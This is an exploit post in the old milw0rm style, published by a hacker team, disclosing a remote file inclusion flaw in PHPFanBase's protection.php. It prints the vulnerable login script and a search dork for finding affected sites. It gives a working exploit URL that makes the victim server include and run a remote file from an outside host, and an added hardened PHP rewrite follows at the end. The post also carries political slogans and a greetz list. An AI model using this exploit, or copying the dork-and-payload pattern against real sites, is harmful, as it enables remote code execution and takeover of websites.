--------------------------------------|| Viva Palestine ||-----------------------------------------
--------------------------------------|| Free Saddam Hussien ||-----------------------------------------

PHPFanBase (protection.php) Remote File Include Vulnerability

Found By : CoLd Zero [ Wasem898 ]
Source : www.4azhar.com
SpECiALPowEr.oRg
A_mal Team
PalesTine Arab Muslim Hacker
http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
# PHPFanBase ]All[
#
# Class: Remote File Include Vulnerability
# Published 2006-12-19
# Remote: Yes
# Type: Dangerous
# Site: http://codegrrl.com/!/scripts/
#
# Author: Cold Zero
# Contact: c.o.1.d.0@hotmail.com
#
# Dork: Powered By PHPFanBase
######################################################

File : /protection.php
===========================
<?
$user_passwords = array (
    "$admin_username" => "$admin_password"
);

// This is the page to show when the user has been logged out
$logout_page = "$siteurl";

// Page with login form
$login_page = "login.php";

// Page to show if the user enters an invalid login name or password
$invalidlogin_page = "invalidlogin.php";

//DON'T EDIT ANYTHING BELOW THIS!!!
if ($action == "logout") {
    Setcookie("logincookie[pwd]","",time() -86400);
    Setcookie("logincookie[user]","",time() - 86400);
    include($logout_page);
    exit;
} else if ($action == "login") {
    if (($loginname == "") || ($password == "")) {
        include($invalidlogin_page);
        exit;
    } else if (strcmp($user_passwords[$loginname],$password) == 0) {
        Setcookie("logincookie[pwd]",$password,time() + 86400);
        Setcookie("logincookie[user]",$loginname,time() + 86400);
    } else {
        include($invalidlogin_page);
        exit;
    }
} else {
    if (($logincookie[pwd] == "") || ($logincookie[user] == "")) {
        include($login_page);
        exit;
    } else if (strcmp($user_passwords[$logincookie[user]],$logincookie[pwd]) == 0) {
        Setcookie("logincookie[pwd]",$logincookie[pwd],time() + 86400);
        Setcookie("logincookie[user]",$logincookie[user],time() + 86400);
    } else {
        include($invalidlogin_page);
        exit;
    }
}
===========================

Exploit :

Http://www.Victem.0/[PaTH]/protection.php?action=logout&siteurl=http://4azhar.com/soft.txt?

======================================================
----
GreeTz: [MoHaNdKo] [Cold One] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell] [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[
Everyone I know

****************************************************************
# *www.4azhar.com Securty Team >> www.4azhar.com *
# *SpeciaL PoweR SecuritY Team >> www.specialpower.org *
# *A_mal Hacking Team >> -vv -l -p The-Pradise *
*****************************************************************

# milw0rm.com [2006-12-19]
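
In the code shown, `$siteurl` is never assigned before `include($logout_page)`, so with register_globals enabled a direct request to protection.php can supply it. A hardened sketch of the same file follows, added here as an example and not PHPFanBase's own code or an official patch. The `config.php` file, its keys, and the `show_page()` and `field()` helpers are assumed names.

```php
<?php
// Added example, not PHPFanBase code: hardened sketch of protection.php.
// Assumption: config.php (hypothetical) returns an array with the keys
// 'admin_username', 'admin_password_hash' (password_hash() output), 'siteurl'.
declare(strict_types=1);

$config = require __DIR__ . '/config.php'; // settings never come from the request

// Fixed allowlist of local pages: no request value can reach include().
const PAGES = [
    'login'   => __DIR__ . '/login.php',
    'invalid' => __DIR__ . '/invalidlogin.php',
];

function show_page(string $key): void
{
    include PAGES[$key];
    exit;
}

// Read a request field explicitly; register_globals is not relied on.
function field(array $src, string $name): string
{
    return is_string($src[$name] ?? null) ? $src[$name] : '';
}

session_start(['cookie_httponly' => true, 'cookie_samesite' => 'Lax']);
$action = field($_REQUEST, 'action');

if ($action === 'logout') {
    $_SESSION = [];
    session_destroy();
    // Redirect to the configured URL; a URL is never passed to include().
    header('Location: ' . $config['siteurl']);
    exit;
}

if ($action === 'login') {
    $user = field($_POST, 'loginname');
    $ok = hash_equals($config['admin_username'], $user)
        && password_verify(field($_POST, 'password'), $config['admin_password_hash']);
    if (!$ok) {
        show_page('invalid');
    }
    session_regenerate_id(true);
    $_SESSION['user'] = $user; // server-side session replaces the password cookie
} elseif (!isset($_SESSION['user'])) {
    show_page('login');
}
```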